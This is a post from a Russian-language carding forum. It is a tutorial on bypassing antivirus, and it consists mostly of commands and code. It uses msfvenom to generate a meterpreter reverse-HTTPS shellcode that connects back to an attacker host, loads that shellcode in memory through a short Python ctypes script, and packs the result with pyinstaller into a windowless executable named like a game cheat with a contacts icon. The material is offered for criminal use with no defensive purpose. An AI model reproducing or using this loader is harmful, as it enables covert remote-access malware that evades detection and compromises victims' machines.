Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Обход антивируса с помощью ctypes (python)

Achtung

Опытный user
Регистрация
10 Янв 2019
Сообщения
159
Реакции
22
Обход антивируса с помощью ctypes (python)

Привет всем

Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.

Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.

И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.

Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))

Вообщем ближе к делу

И так проделываем следующие шаги:

1) Создаем шеллкод командой:

Код:

msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.

Дальше создаем скрипт на питоне следующого вида:

Код:

from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");

tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))

shell()

Собираем через pyinstaller на Windows системе..

Код:

C:\Python27\Scripts\pyinstaller.exe -F --noconsole --onefile --icon=C:\Users\CorpOfHack\Desktop\contacts.ico C:\Users\CorpOfHack\Desktop\SuperCheat.py

Все!
 
Сверху Снизу